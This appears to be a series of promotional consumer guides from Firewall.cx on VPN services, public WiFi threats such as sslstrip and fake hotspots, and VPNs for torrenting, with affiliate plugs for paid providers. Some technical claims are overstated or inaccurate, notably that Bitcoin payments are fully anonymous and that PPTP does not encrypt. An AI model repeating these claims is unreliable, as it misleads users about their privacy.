On the other hand if you are downloading a torrent file you don’t need to provide any credentials and therefore your identity remains hidden as long as you’re connected to the VPN.

To understand how well a VPN Service can disguise your activities, let’s go back to the initial example with the mobile phone and see how well a VPN Provider manages to hide a real IP address after connecting to a VPN server located in Canada:

 Changing locations. From Melbourne Australia to Canada thanks our VPN service

Changing locations. From Melbourne Australia to Canada thanks our VPN service

Notice how I’m now located in Canada and assigned a Canadian-based IP address. This is because our mobile’s internet traffic is tunnelled through the VPN all the way to the Canadian-based VPN server and exits from that point to the internet.

VPN Service Provider Shared IP vs Dedicated IP

When connecting to a VPN Service Provider you’ll usually be assigned a Shared IP address, that is, an IP address that is used by many users simultaneously. While using a Shared IP address might not sound ideal, it does in fact provide increased anonymity as opposed to using a Dedicated IP address that is solely assigned to your VPN account.

VPN Service Provider with Shared IP address 

VPN Service Provider with Shared IP address

Dedicated IP addresses are usually required when accessing IP restricted servers or websites. Running a website or FTP server off your VPN Service Provider would also be a reason to make use of a Dedicated IP address.

For the majority of VPN users who perform casual web browsing, downloading, file sharing and require anonymous browsing capabilities the Shared IP address is considered a secure option.

Smart-DNS Proxy Server

Smart-DNS is a newer service provided by VPN Service Providers. Some offer it as an add-on service while others include it with the VPN subscription.

We’ve already explained that with a VPN service all internet traffic is channelled through an encrypted connection to a VPN server and exits to the internet from there.

With Smart-DNS a connection is established between the Smart-DNS server and client, however, communications are not encrypted and only selected traffic is channelled and sent to the Smart-DNS server, which works like a Proxy Server to help unlock access to geo-restricted services such as TV shows, NetFlix and other.

 A Smart-DNS Proxy channels specific requests and data to unlock geo-restrictions

A Smart-DNS Proxy channels specific requests and data to unlock geo-restrictions

This is achieved by overriding selected DNS entries, e.g www.netflix.com, so that DNS queries resolve to the address of the Smart-DNS server rather than the real server. The Smart-DNS server accepts clients requests and acts as a proxy so that selected services are channelled through it, allowing access to any region-restricted or blocked content from anywhere in the world.

It’s important to keep in mind that Smart-DNS service is not a VPN Service replacement. All traffic sent and received via the Smart-DNS service is unencrypted and speeds are usually faster compared to a VPN thanks to the absence of encryption, making it an ideal solution for accessing region-restricted streaming services or services where data encryption is not important.

Impact Of a VPN On Your Mobile Device’s Speed, Battery Or Computer

Running a VPN connection will have an impact on your mobile device or computer. The level of impact will vary between different devices and their CPU processing capacity.

Following are key factors that will determine the impact on your device/system:

  • CPU or processing power of your device (Single Core, Quad Core etc).
  • Quality of the VPN Client software (poorly or well written software).
  • VPN Encryption algorithm used to encrypt/decrypt data.

Let’s take a look at each point.

CPU – Processing Power Of Your Device

The faster the CPU the smaller the impact will be. Computers with iCore3, iCore5 or iCore7 processors offer more than enough power to perform all the necessary processing and a VPN will not significantly affect the user experience.

Mobile phones with dual or quad CPU should also be able to handle a lightweight VPN Client without any difficulty, however, you must keep in mind that heavy internet usage also means more work for the CPU – this translates to a battery that is drained at a much faster rate. Mobile users should generally use the internet in the same way as before installing the VPN client to see the real impact it will have on their device. Newer mobile devices shouldn’t experience any noticeable difference.

Quality Of The VPN Client Software

Just like any piece of software a well-designed VPN application will function without problems and will limit its usage of system resources. There are VPN Providers that offer very cheap subscriptions, however, their VPN Client software might be buggy causing either frequent crashes or taking a long time to respond to user actions.

It’s recommended to make use of high-quality VPN providers such as StrongVPN and ExpressVPN who develop and thoroughly test their software. Our Best VPN review offers a comparison between 5 Top VPN Services for you to choose from.

VPN Encryption Algorithm

There are quite a few VPN encryption options available through your VPN Client and each one of these will provide you with a different level of security. Stronger encryption, e.g. L2/IPSec, means better security, however, this will have a slightly larger toll on your device’s CPU as it will be required to work harder to encrypt and decrypt your traffic due to the high complexity of the strong encryption protocols.

On the other hand, selecting a weaker encryption protocol such as PPTP means that demands on the CPU will be lower but so will the security offered.

Newer protocols, such as OpenVPN, combine the best of both worlds and deliver a fast & secure VPN service at minimal cost to your CPU. OpenVPN is generally the recommended VPN protocol.

VPN Protocols

As mentioned earlier a VPN makes use of different encryption protocols to secure the connection between the end-user and the VPN server. Selecting the best VPN protocol is important so let’s discover the most commonly supported encryption protocols used by VPN providers:

  • PPTP - Point to Point Tunnel Protocol. Old lightweight VPN protocol which is still very popular but doesn’t offer much security. Ideal for streaming and basic VPN needs but not for torrenting.
  • L2TP / IPSec - Layer 2 Tunnel Protocol & IP Security. The evolution of PPTP offering much better security and encryption at the slight expense of speed.
  • SSTP - Secure Socket Tunneling Protocol. A flexible SSL-based encryption by Microsoft. Good alternative to L2TP/IPSec but not as good as OpenVPN.
  • OpenVPN – a newer open-source VPN protocol that offers great security, flexibility and compatibility. Supported by router firmware such as DD-WRT, Tomato and others.
  • More servers means better VPN user distribution. This translates to faster servers and fewer users per VPN server.
  • Higher service availability. If one or many servers go down you’ll have plenty of others to connect to therefore limiting the impact on your VPN service.
  • Ability to access geo-restricted content for every country that has a VPN server available for you to connect to.
  • Ability to connect to a VPN server that is located closer to the source you are trying to access, therefore providing better download/upload speeds.

Users should be aware that not all encryption protocols offer the same security and performance level. For example, PPTP is an older VPN protocol that doesn’t really encrypt the information but simply encapsulates user’s data. Think of it as placing a letter (data) inside a standard envelope. The envelope is light so you can carry more of them within a specific period (high performance / throughput). Despite the lower security offered by PPTP, it is still widely used today because not many understand the level of security it provides but also because it’s managed to penetrate the market the past 15 years and is still supported by newer VPN devices and servers.

On the other hand L2TP/ IPSec is the evolution of PPTP and was introduced as an alternative more-secure VPN protocol. It offers significantly higher security but is a slower protocol meaning it has more overhead.

SSTP is a Microsoft proprietary protocol found on all Windows operating systems after Windows Vista Service Pack 1. SSTP is preferred over PPTP and L2TP as it is able to pass through most firewalls without a problem (requires TCP Port 443) whereas PPTP and L2TP/IPSec might not be able to pass through a firewall as they use uncommon TCP/UDP ports which are usually blocked by corporate or guest networks.

Finally, OpenVPN is by far the preferred VPN protocol. It’s an open-source (freely distributed) newer technology supported almost every device and VPN service provider. It’s flexible, offers great security, has moderate CPU demands and will run in almost any environment capable of passing through firewalls without a problem. In addition, router software such as DD-WRT, Tomato and Mikrotik support OpenVPN allowing users to connect to their VPN provider at the router level, removing the need for any VPN client software on devices connecting to the home or business network.

Using the right VPN encryption protocol is important as it will significantly affect the security provided as well as your upload/download speeds.

VPN Servers – The More – The Merrier

VPN Service Providers generally deploy VPN servers around the globe to accommodate their customers. Using a VPN Provider that has hundreds or thousands of servers deployed is always a great option and there are plenty of reasons for this:

  • More servers means better VPN user distribution. This translates to faster servers and fewer users per VPN server.
  • Higher service availability. If one or many servers go down you’ll have plenty of others to connect to therefore limiting the impact on your VPN service.
  • Ability to access geo-restricted content for every country that has a VPN server available for you to connect to.
  • Ability to connect to a VPN server that is located closer to the source you are trying to access, therefore providing better download/upload speeds.

If the VPN Provider does not reveal the number of VPN servers it maintains, then check the list of countries and cities where VPN servers are available – this information is usually provided and is a good indication that there are plenty of servers to select from.

VPN Kill-Switch Feature – Avoid Accidently Exposing Your Identity

The VPN Kill-Switch is a feature built into the VPN Client so that when enabled it will continuously monitor your VPN ensuring all traffic is passing through the VPN.

When the Kill-Switch detects that your VPN has disconnected it will automatically stop all internet traffic from and to your PC or mobile device to avoid it from exposing its real identity - IP address.

A VPN with the Kill-Switch enabled is the best practice for torrenting as it helps users from accidently exposing themselves to the public, especially when torrenting over night or the PC is left switched on to complete its download(s).

DNS Leak Protection

When connecting to a VPN the PC or mobile device is forced to use secure DNS servers for all DNS queries. These DNS servers are usually the VPN provider’s DNS servers. This ensures the ISP and government is unable to track any DNS queries which might reveal the user’s online activities.

A DNS Leak occurs when the operating system begins sending DNS queries to the ISP’s DNS or other insecure DNS servers. The reason for a DNS leak might be intentionally modified device settings (e.g DNS server settings) or even the way the operating system behaves – which is the case with the Windows operating system.

One of Windows 10 new features allows it to direct DNS requests to the local network router or ISP, bypassing the VPN tunnel. This setting was designed to enhance and speed-up the DNS query process however it has created a major security issue as users can easily be exposed without knowning.

Our DNS Leak Testing & Protection article explains the problem in-depth and provides ways to protect against it. A high-quality VPN service will include DNS leak protection embedded within the VPN client to help protect its users from being unknowingly exposed to this serious security threat.

‘No-Log’ VPN Service Provider Policy

Not all VPN Service Providers are completely anonymous. Some VPN Service Providers keep extensive logs of their users’ IP addresses and VPN login sessions.

A ‘no-log’ VPN Service does not keep any logs of its users or their online activities therefore making it extremely difficult to trace any of their online activities.

VPN Providers that keep some type of logs seriously risk exposing their users. In the event of a security breach, or government demand to access these logs, users are left vulnerable as it will make it easier to trace previous online activities.

VPN Service Providers who offer a “no log” policy usually state something along the following lines in their privacy policy:

“We never keep traffic logs, and we also don’t keep any logs that might enable someone to match an IP and timestamp back to a user.”

It’s important to keep in mind that depending on the country where the VPN Provider resides, they might be required by law to store their logs no matter what impression they give on their site. For example, countries such as Romania, Netherlands, Sweden and Luxembourg are not currently required to keep logs while other countries in the European Union are required to do so.

Make sure the VPN provider’s “no log” policy is absolutely clear to you before signing up.

Paying your VPN Service Provider without Exposing Your Identity

VPN Service providers accept a number of different methods including credit cards, VISA, MasterCard, PayPal, BitCoin and more.

While users can use any of the above methods for payment those concerned sharing personal information and seeking complete privacy can use BitCoin.

BitCoin is a virtual form of digital currency that allows users and companies to transact online without going through a bank. Payments are anonymous so there is no trace of your identity and since banks are not involved in the transaction there are fewer fees both for the sending and receiving party.

Money-Back Guarantee – Making the Most Out of Your Trial

The money-back guarantee option is usually offered by the popular and reputable VPN Service Providers. Some offer a 3, 5, 7 or 30 day refund policy while others provide a free usage period after which you are required to purchase a subscription if you wish continue using the service.

Whichever the case, a “try before you buy” policy is always preferred since it provides you with the opportunity to try the service and ensure it works well for you. It is always recommended when trying a new VPN service to connect to multiple VPN servers throughout the trial period to help get a good idea on how well the VPN provider is performing. Try downloading via Torrent, accessing Netflix or similar services, visit frequently used websites and see how the service performs before commit to a long-term plan.

Finally ensure you are fully aware of the money-back guarantee conditions. Some VPN providers will happily provide a refund within the trial-period however they might refuse to issue the refund in case of excessive downloads.

Number of Simultaneous VPN Connections

All VPN Service Providers support simultaneous connections using a single VPN account allowing users with multiple devices e.g laptop, mobile phone, tablet etc, connect through any of their devices.

Users who wish to take advantage of a VPN Service will surely appreciate this capability and it’s quickly becoming very popular. Many users take advantage of this feature and share the VPN account with friend to split the VPN cost.

A minimum of at least 2 simultaneous VPN connections should be supported by your provider, one for the laptop/workstation and one for your mobile phone or tablet. Support for more than 2 devices is always nice to have as you can easily share it with a friend.

Customer Support

VPNs have evolved enough today so that a user at any technical level should be able to download and install the VPN Client without difficulties. Nevertheless, if you’re new to VPNs the amount of information can often be overwhelming and confusing.

For this reason 24/7 Customer Support is important and it should be easily accessible via the provider’s website, email or even phone.

The most common method today is 24/7 online chat support followed by email support while some providers might even offer phone support.

With chat and email support you should be able to precisely describe any problem you are having so that the person on the other side can understand. This will help resolve your problem much faster and save time and unnecessary frustration.

Choosing the Right VPN Provider

With over 200 VPN Service Providers, making the right choice can be a very complicated and time-consuming task. While the price tag always plays a significant role it should not be the major decision-making factor.

Protecting your online privacy correctly is very important even if that means spending a few additional dollars.

Firewall.cx is the only network security site with industry security experts who have performed in-depth reviews of VPN providers to produce the Best VPN Service guide based on the following criteria:

  • VPN Speeds and Latency Test
  • VPN Server locations (countries) amount of servers world-wide
  • Netflix VPN, Torrenting and Blocked sites, Geo-blocking Bypass
  • Security features (DNS Leak Protection, Kill Switch etc)
  • Multiple device login (Laptop, Phone, Tablet etc)
  • Encryption protocols (PPTP/L2TP IPSec/OpenVPN etc) & Support for Dedicated VPN Routers
  • No-Log Policy & Bitcoin payment support
  • User-Friendly VPN client interface
  • Pricing – based on a 12 month subscription

Summary

Understanding what a VPN service is and how it can help you protect your online privacy is very important today. Enabling anonymous browsing and protecting your online identity against attack is as equally important as running an antivirus on your computer. VPN Services help provide a significant level of identity protection while at the same time unlocking geo-restricted content with the click of a button. Protect your online transactions and activities with a highly recommended VPN Service today.

  • Hits: 31553

VPN Hotspot - How to Stay Safe on Public & Guest WiFi Networks

Is Guest WiFi Safe?

Public and Guest Wifi security threatsIt’s hard to go to a pub, café, or hotel these days without running into public or guest WiFi. In many cases, an internet connection can feel like a necessity – keeping up with work or personal emails, arranging plans with friends, checking social media. Connecting is usually as easy as entering an email address, filling out a survey, or entering a code on a receipt.

It's an easy trap to fall into. Cellular data is expensive. In the US, 500 MB of pre-paid data costs an average of $85 US. If your contract doesn’t have a large data allowance, free WiFi is a godsend. However, that convenience comes with considerable risk to your privacy and security. If you’re not using a VPN at a public hotspot, you’re opening yourself up to all kind of malicious attacks and data interceptions such as sslstrip man-in-the-middle attack (analysed below), online activity monitoring, computer hijacking, restricted online browsing and many more serious security threats.

Download a Free 7 day fully functional StrongVPN service. Unlimited download, strong encryption, supports all your devices!

Public - Guest WiFi Security Risks

The biggest misconception about open WiFi is that it offers the same protection as your home network. That couldn’t be further from the truth. The annoying password on your home network does much more than keep people from connecting. It encrypts your data so that those on the outside have trouble looking in.

By nature, guest WiFi has no password. In most cases, that means no encryption. With a simple tool, anyone on the network can see which websites you’re visiting. In some cases, they can even intercept the emails you send, the files on your computer, and passwords. It doesn’t matter if you’re at a high-security airport or the coffee shop down the road.

Even when an attacker isn’t around, you’re putting trust in the security of everyone else on the network. You may have the latest version of Windows 10, but the person next to you could have no security knowledge. Some forms of malware attempt to spread themselves to other people on the network, and the user probably doesn’t even know about it.

Common WiFi Attacks used at Internet Hotspots

vpn hotspot - SSL Connections are encrypted connectionsThankfully, wifi snooping is on the decrease thanks to SSL encryption. This web standard is spreading across all the most popular sites, and you’ll notice it by the HTTPS icon in your browser (as seen in the image on the left). It means that while someone can see the url you’re on, they can’t see your emails or the password you just typed in. Unfortunately, this won’t stop someone resourceful. In fact, SSL can be bypassed with a single method.

In 2009, security expert Moxie Marlinspike introduced sslstrip. By routing a victim’s connection through their own machine, an attacker can redirect them to the HTTP version of the page. The browser won’t even detect this and the victim has no idea what’s going on.

 how sslstrip wifi attack works

Representation of how an sslstrip wifi attack works

The vulnerability comes from the fact that most users don’t type in “https://” at the beginning of every url. This means that when they first connect to the site, it’s HTTP. Most websites will then redirect users to an HTTPS version, but ssltrip steps in and sends back HTTP instead. The hacker can then view all the user’s requests in plaintext, collecting whatever information he likes.

Though attackers often need specialist software and some technical knowledge, packages such as WiFi Pineapple can make so-called “man-in-the-middle” attacks relatively simple. In a few clicks, users can pretend to be a public network, routing traffic through them rather than to the router. From there, the attacker can force the user to visit websites with malware, install key loggers, and plenty of other shady things. It’s not too difficult, and with the aid of YouTube, a seven-year-old did it in eleven minutes.

In some cases, attackers don’t even need any experience to view your information. Oftentimes, users connecting to hotel WiFi forget to change Windows sharing settings. This makes it easy for anybody to view your shared files with no hacking required. Sometimes this isn’t even password protected, making it child’s play.

However, there are also tools to make more complex processes simple. In 2010, a simple browser extension called FireSheep was released. The tool lets users catch browsing cookies from any website that doesn’t use HTTPS. Though many major websites such as Facebook and Gmail are protected, smaller sites often use HTTP, and many users have the same password for multiple sites.

Firesheep Firefox extension in action 

Firesheep Firefox extension in action

Other tools let you do the same from an Android phone or other devices. And that’s assuming you’re connecting to the right network at all. A common method of attack is to set up a fake network, or honeypot. To the untrained eye, it won’t look out of place. Often, they will make sense in the context, named Starbucks WiFi, for example. In fact, an attacker owns it, and is logging everything you do. Our article configuring Windows 8 / 8.1 as an access point is a good example that shows just how easy it is to configure your workstation into a honeypot.

Hotel Hotspots - 277 Hotels Wordwide with Major Security Flaw

How to stay safe on Hotel and Restaurant Guest WiFiHotels are one of the most vulnerable places for such attacks. They often have hundreds of people connected to the network at a time and hackers can stay in their rooms, undetected by anyone. Most hotels don’t have good security, and standardization means that many have the same, vulnerable hardware.

In 2015, for example, 277 hotels worldwide were found to be using ANTlab’s InnGate device. It’s used by much of the hotel industry to set up guest WiFi, including most of the top 10 chains. Unfortunately, it has a major security flaw, enabling hackers to gain access to users’ data, and sometimes even credit card data held by the hotel.

ANTlab’s InnGate WiFi client login page

ANTlab’s InnGate WiFi client login page

Thankfully, ANTlab has since produced a software update to solve the issue, but it must be installed manually, and there's no way to tell if the hotel has applied the fix. This leaves a situation where you can never truly trust hotel networks.

Business executives should be particularly cautious. Russian security firm Kaspersky Lab discovered in 2014 that hackers were running a malware campaign code-named DarkHotel which was  targeting business leaders at hotels in Asia. DarkHotel is a targeted spear-phishing spyware and malware-spreading campaign that appears to be selectively attacking business hotel visitors through the hotel's in-house WiFi network. When logging into the WiFi, a page asked them to download the latest version of Flash Player, Messenger or other software. The software was legitimate but malware piggybacked on the install, stealing valuable data.

Business Guest WiFi Security

Businesses’ own networks can also be a significant target. Though many private corporate networks invest in security, guest internet is often open and unsecure. This puts clients or visitors at risk, and can also endanger employees using the wrong network. Unfortunately, a number of solutions fail to offer proper network encryption.

This opens users up to the dangers mentioned before, such as man-in-the-middle attacks. Browsing is open to snooping and could result in lost passwords, malware and more. Many routers try to circumvent the risk slightly by implementing a portal page, but this can lead to further problems.

In the case of some Linksys and Belkin routers, the page uses HTTP rather than HTTPS. That means that anyone sniffing WiFi traffic nearby can discover a password in plaintext when its typed in. Naturally, that gives them access to the network anyway, and possibly other logins if the password is re-used.

In addition, some guest networks still use Wired Equivalent Privacy (WEP) for protection. WEP is outdated and easily circumvented, now succeeded by WPA and WPA2. WEP can now be easily circumvented, and in 2011 three Seattle-based hackers stole over $750,000 from local businesses using this method.

The three drove around with networking tools, looking for unsecure or accessible wireless networks and stealing data. Employee social security numbers, email addresses, company credit card numbers and other information was then sold on to third parties.

Staying Safe on Public Wi-Fi Networks & Internet Hotspots

Fortunately, there are several ways you can stay safe on public WiFi and protect both your information and clients. Firstly, check that you’re connecting to the right network. It’s stupidly easy for someone to create their own hotspot called “Hotel WiFi” and log all your connections. It always pays to ask an employee which WiFi you should connect to.

Before you connect, check your sharing settings. This will stop the average joe from seeing all your shared documents with a click. You can view them easily in Windows via Network and Internet> Change advanced sharing settings.

Disabling Network Discovery and File Printer Sharing when connected to Public wifi

Disabling Network Discovery and File Printer Sharing when connected to Public wifi

You’ll want to disable both Network Discovery and File and printer sharing. This will make it harder for people to access all your documents. In OSX you’ll want to go to System Preferences> Sharing and untick all the boxes there.

While you’re at it, you may as well make sure your Firewall is enabled. Often, users can disable the setting due to annoying software asking for permissions. However, having the Firewall enabled is essential on guest internet. Though it’s not infallible, it will make it harder for attackers to poke around in your PC.

In Windows, you can simply type in firewall, and then click turn Windows Firewall on or off on the left side of the control panel. OSX is equally simple, and both let you set exceptions for public and private networks.

Users should also be keeping both their operating system and applications up to date. This is especially important for browsers and plugins like Flash and Java. Not only will this reduce the vulnerabilities on your computer, you won’t be fooled by the bogus update messages mentioned earlier.

Speaking of browsers, try to make sure you’re using HTTPS where possible. A simple way is to visit popular websites in HTTPS on a secure network and then bookmark them. When you’re in public, only use that bookmark to access your logon. Alternatively, extensions such as HTTPS Everywhere will force Chrome, Opera, or Firefox to use SSL encryption on all webpages that support it. This will protect you against sslstrip and is much more user-friendly.

If someone still manages to sniff your password, two-factor authentication can be a lifesaver. Most major email providers such as Gmail and Hotmail provide this service, as does Facebook. Essentially, it makes you enter a time-sensitive passphrase when connecting from a new device. This can be delivered via text, a mobile app, or email. The extra step can be enough to turn away most hackers.  

However, the only way you can be 100% sure is to not visit sensitive websites at all. Generally, it’s a bad idea to go on PayPal, online banking, or other such websites on guest WiFi. You can never be confident you’re truly safe, and that applies to mobile banking too. When you’re done browsing, you should consider disconnecting from WiFi or turning off your computer. The longer your PC is open and on the network, the longer an attacker has to find vulnerabilities.

All of these steps will help a lot with creating a secure public WiFi experience. However, the unfortunate truth is that a determined attacker can still bypass these measures. To significantly increase your safety, you’ll want to invest in a VPN Service Provider. While selecting a VPN Provider can be a time-consuming process our Best VPN services comparison will help considerably in the process of selection.

Secure WiFi Access and Identity Protection with VPN Service Providers

A Virtual Private Network is exactly what it sounds like. Simply, a VPN allows you to make a secure connection to a server over the internet. All your traffic goes through that server, with very strong encryption that makes it almost impossible to snoop. When you connect to an unprotected WiFi network, attackers will just see a load of random characters. Trying to circumvent that is simply not worth their time.

With a VPN Provider your PC creates a tunnel to send your data over the internet. Every piece of data sent over the internet is in chunks called packets. Each packet has part of the data, as well as other information like the protocol (HTTP/HTTPS) and the user’s IP address. When you connect to a VPN, that packet is sent inside another packet. As you would expect, the outer packet provides security and keeps the information from prying eyes.

With a VPN Provider all internet traffic is encrypted and secure

With a VPN Provider all internet traffic is encrypted and secure

However, as mentioned before, data is also encrypted. How exactly this is achieved depends on the security protocol of the VPN client. Using the Best VPN Protocol is important to ensure your VPN connection has the most suitable encryption depending on your online usage. Following is a quick rundown of the various encryption methods VPN providers use:

  • Point-to-Point Tunnel Protocol. Supported by most VPN providers, this is an obsolete and insecure protocol. While it doesn’t support encryption, it creates a Generic Routing Encapsulation (GRE) Tunnel between the two endpoints (client – server) and encapsulates all traffic inside the tunnel. Because of the encapsulation process PPTP can suffer from slow performance issues if there is not enough bandwidth available.
  • L2TP / IPSec: Layer 2 Tunnel Protocol is considered the evolution of PPTP coupled with IPSec for encryption. It’s a highly secure protocol used by all VPN Service providers and manages to offer a high-level of confidentiality.
  • SSTP – Secure Socket Tunnel Protocol: A fairly newer encryption protocol that relies on SSLv3/TLS for encryption which means SSTP is able to pass through most Firewalls and Proxy Servers using TCP port 443 (HTTPS). SSTP is supported by Microsoft Windows Vista SP1 and later plus RouterOS. As with most IP-tunnelled protocols, SSTP performance can be affected if there is not enough bandwidth available.
  • OpenVPN: One of the latest VPN clients offering great security and flexibility. OpenVPN is maintained by the open-source community and relies on OpenSSL to provide encryption. OpenVPN can utilize both UDP and TCP protocols making it a highly desirable alternative to IPSec when it’s blocked.   OpenVPN can support up to 256bit encryption and many vendors have implemented into their products e.g VPN Service Providers.

Additional Benefits of Using a VPN at Hotspots & Public Wifi Networks

As well as data protection, VPNs provide other benefits on public WiFi - Hotspots. Due to the nature of tunnelling, VPNs can be used to bypass content restrictions. This can be particularly useful on guest internet, which often has filtering policies in place.

They also give you some anonymity when connecting to the web. The website you’re connecting to sees your connection is coming from wherever the VPN Server is located, not your physical (real) location. Moreover, as all of your information is encrypted, the broadband service provider can’t spy on you either. This has the bonus of protection from surveillance by the government or other parties. For a journalist or lawyer, that can be essential.

However, not all VPNs are created equal. The protection your VPN hotspot provides depends largely on which of the above protocols they use and how the data is stored. Some VPN services keep a log of every site you visit and from which IP address. Naturally, that removes some degree of anonymity.

This is particularly relevant if they’re located in one of the so-called ‘five-eyes.’ The US, UK, Canada, Australia, and New Zealand all share the data from their intelligence agencies. In many cases, VPN providers must legally hand over user data to the government on request. The only way VPN hotspots can circumvent this is by not keeping logs at all. For someone just wanting to stay safe on public WiFi, that’s not much of a concern. If you’re looking for the full package, though, it’s worth looking up their policies.

Of course, some providers offer VPN functionality free of charge. Unfortunately, these are often subject to data caps, advertisements, or other money making methods. In some cases, free providers have sold user bandwidth or connection data. Though they’ll do in a pinch, free VPNs are no substitute for a paid service. If you go free, it’s best to do some research beforehand.

There’s also availability to consider. Most paid VPN Services support all the major devices and operating systems, such as Windows, OSX, Linux, iOS, Android and routers. That means you can be protected on all your devices, but not necessarily all at once. The limit of devices you can connect varies depending on provider, anywhere between 2 and 6. The majority support 4 or 5 devices, but this can change depending on your plan.

Despite this, it’s easy to get a VPN set up on any device. Though some don’t support less popular platforms like Windows 10 Mobile, it’s usually possible to set them up manually via a built-in settings menu.

For more obscure devices like a DS or PS Vita, or just to avoid setup, you can share your VPN connection from a PC. This essentially acts as a separate, VPN Hotspot, meaning you’ll have your own password-protected WiFi network that’s secure and encrypted. You can set one up on a Windows PC with the following steps or read our Windows WiFi Hotspot article:

  1. Connect your PC over Ethernet or WiFi
  2. Hit Start and type cmd and select Open command prompt as an administrator
  3. Type netsh wlan show driver
  4. Look for the network you’re connected to and check for the field Hosted network supported: Yes
  5. Type netsh wlan set hostednetwork mode=allow ssid=VPN hotspot key=MyP@$$!
  6. Type netsh wlan start hostednetwork
  7. Go to Control Panel>Network and Sharing Center and click Change adapter settings
  8. Find the relevant VPN adapter and click on Properties
  9. Go to the Sharing tab and tick Allow other network users to connect through this computer’s internet connection
  10. Start up your VPN and connect to the new VPN hotspot from any device

This is a good solution if you have multiple people in a hotel suite or café, and saves downloading an app on every device. For easier setup, you can download a tool like Virtual Router Manager. You’ll still need a compatible WiFi card, but you can set up the VPN hotspot in just a few seconds.

Another great solution for home or office environments is to configure your router to connect with your VPN Provider. A solution like this will allow you to cleverly share your VPN connection with all devices in your network without requiring to separately configure each one with a VPN client.

Summary

You can never be truly safe on Public or Guest WiFi. Whether you’re in a hotel, café or on a business guest network, a determined attacker may be able to find a way. Regardless of how safe you think you are, it’s always worth avoiding sensitive logins while on an unsecure connection.

If you have to, a VPN will significantly reduce the risk. For most attackers, it will be more hassle than it’s worth. Setting up a VPN hotspot can extend this protection to any device, so friends and family have little reason to be unsafe.

Naturally, VPNs aren’t infallible. Users still need to watch out for fake WiFi portals, which may launch in the time between connecting to a network and launching the VPN. This short window may also give the attacker information about your system or other clues to help them.

However, in combination with other measures, a VPN is possibly the best protection you’ll find. Without a VPN, hotspots just aren’t secure and, considering what’s on the line, $3 to $8 US a month for a fast & secure VPN service is a complete bargain.

  • Hits: 24363

VPN For Torrenting, P2P and File Sharing. Test Anonymous Torrenting, Avoid Bandwidth Throttling, Protect Your Identity

VPN for Torrenting GuideThe word torrenting is often viewed as synonymous with pirating. It’s seen as a shady and illegal practice, used to con hard working artists out of their money. As a result, internet service providers often blanket ban torrent websites or severely throttle downloads. If you aren’t using a VPN for torrenting, there’s a good chance you’re affected by this. However, ISPs over-arching policies can hurt users that use Peer-to-Peer (P2P) file sharing for innocent purposes.

How Torrenting & Peer-to-Peer (P2P) Works

Instead of using dedicated servers, P2P utilizes the connections of other users to distribute files. As they download a torrent, the individual also uploads a small portion for others to download. This creates an interconnected network where files are provided by many different people.

One huge example of legal P2P usage is gaming. Online games such as World of Warcraft, League of Legends, and downloads from UPlay all have a P2P option. This saves on server costs for the developers and can increase torrent speed. This can foster development for smaller, indie companies, who might not have the infrastructure for lots of servers.

Download Torrents Safely & Bypass any geo-location restrictions using StrongVPN Client

In fact, Windows 10 even takes advantage of this method to save on bandwidth issues. The OS delivers updates in multiple parts, pulling bits from both PCs on the same network, over the internet, and Microsoft’s own data centers. This feature is turned on by default since the Windows 10 Anniversary Update in the summer of 2016.

However, more important is the role of torrenting in distributing public data. The Internet Archive caches huge amounts of websites and offers a huge variety of public domain books, TV shows, and audio recordings. The non-profit recommends the use of torrents to download its content, as it saves on bandwidth and allows it to continue its vital work.

This role extends even to government. NASA has used torrents several times in the past to distribute its findings, including this high-resolution picture of earth. The UK government has done similarly, releasing large datasets on public spending via BitTorrent.

As well as supporting government, BitTorrent is also used to oppose it. Transparency sites such as Julian Assange’s Wikileaks often release so-called ‘insurance files’ through torrents. Shortly before the leak of Hilary Clinton’s emails, the site published an 88GB, 256-AES encrypted file. This keeps the organization from being shut down – if WikiLeaks goes dark, an automated message sends out an unlock password for all the data. In previous cases, files have reached upwards of 400GB.

Despite the genuine uses of P2P, users still get attacked by copyright claimants, sometimes inaccurately. In 2015, the creators of B-movie Elf Man filed a lawsuit against hundreds of users who claimed to have never even heard of the movie. Ryan Lamberson was one of these defendants and was eventually reimbursed for $100,000 in legal fees. Closer examination of evidence revealed that the tools used by the copyright holder did not account for several shortcomings, and only tracked uploads rather than downloads.

The defense also pointed out that the primary evidence was little more than an IP address. This information came from a third-party software that connected to the BitTorrent swarm in which the files were shared. However, some torrent software allows for the spoofing of IP addresses, and the investigator failed to account for several other false positives. Because of the win, several other Elf Man cases were dropped or settled for a lower value.

Other thrown cases include the Adam Sandler movie The Cobbler, and a 53-year-old artist painter was wrongly accused of illegally downloading and sharing 18 films and TV shows. Thankfully, there is a simple way to avoid such risks.

Anonymous Torrenting with a VPN Service

Using a VPN for torrenting will ensure your identity remains private, not just from ISPs, but copyright claimants and government. When you connect to a VPN, all your traffic goes through a “tunnel”. The individual packets that make up your data contain information such as IP Address, protocol, and other identifying information.

Tunneling wraps those packets in others that provide extra security against prying eyes. In addition, the data is encrypted in transit, meaning ISPs, service providers and other middlemen see nothing but gibberish. Different providers use different encryption methods, the most common being IPSec, L2TP, and OpenVPN

The benefit of this tunneling is clear. An ISP or copyright holder can only see the IP address of the VPN servers, not your own. This makes for anonymous torrenting, and they can’t see what website’s you’ve visited either. Though this might not protect you against entirely baseless accusations, it should stop you from coming under genuine suspicion.

A VPN for torrenting will also provide you with protection in other ways. To stay safe on public WiFi, they are almost essential. Without one, attackers can snoop on your online traffic, possibly recovering passwords and credit card details. You could also be vulnerable to malware on your machine and tracking from third parties.

However, not all VPNs are created equal. Though some provide anonymous torrenting and public WiFi protection, others are questionable at best. Researching hundreds of different providers can be a pain, so instead we’ve done that for you. Our network security team has produced a VPN service review of all the Best VPN Service Providers, alongside detailed feature lists.

Finally, our Begineers Guide to VPNs article aims to educate users with all the necessary information so they can fully understand how a VPN works, security features offered by the best VPN service providers, what to look for in a VPN and what to stay away from.

Avoid ISP Bandwidth Throttling

Avoiding ISP Bandwidth ThrottlingEncrypted communication has the add-on effect of avoiding bandwidth throttling from ISPs. As mentioned earlier, service providers inspect packets to classify different data. This lets them put a speed cap on specific mediums. This is usually done unofficially and some service providers will deny the practice despite significant data to the contrary.

Despite this, it’s becoming more and more routine for ISPs to throttle or block torrent downloads. Everything you receive goes through their servers, allowing them to analyse it with Deep Packet Inspection. This method lets the service provider look at different data packets and classify it into different categories, such as video, music, and torrents.

Bandwidth throttling can be achieved in several ways. One method is blocking router ports often used for BitTorrent. Typically, P2P downloads go through TCP ports from 6881-6889. By limiting the speed on these, an ISP can cut out a big chunk of bandwidth.

However, this method is becoming less and less popular. Increasingly, torrent clients randomize TCP ports or tell users if there are any issues. As a result, internet service providers use methods that are harder to dodge.

